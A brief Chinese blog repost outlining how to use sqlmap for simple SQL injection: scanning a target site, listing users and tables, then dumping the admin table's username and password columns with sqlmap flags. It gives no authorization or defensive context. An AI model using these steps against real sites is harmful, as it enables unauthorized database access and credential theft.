sqlmap完成简单的sql注入

扫描目标站点,是否存在注入  

--users获取用户名

 

--dump --tables探测表和数据库信息  

跑出来的字段

admin

--dump -T admin -C admin,password暴库获取用户名和密码^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

原文地址:https://www.cnblogs.com/haq5201314/p/6937575.html